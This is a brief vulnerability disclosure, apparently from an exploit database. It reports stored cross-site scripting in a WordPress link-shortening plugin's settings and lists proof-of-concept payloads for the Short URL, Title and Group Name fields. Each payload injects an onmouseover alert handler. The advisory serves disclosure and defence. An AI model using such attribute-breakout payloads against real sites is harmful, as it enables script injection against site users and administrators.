## https://sploitus.com/exploit?id=WPEX-ID:9EC03EF0-0C04-4517-B761-DF87AF722A64
Multiple parameters in the plugin's settings are vulnerable to cross-site scripting.
Links -> Edit Link
- "Short URL" payload: `9onp" onmouseover=alert(3) abc="`
- "Title" payload: `KaizenCoders" onmouseover=alert(1) abc="`
Groups -> Edit Group
- "Name" payload: `title" onmouseover=alert(2) abc="`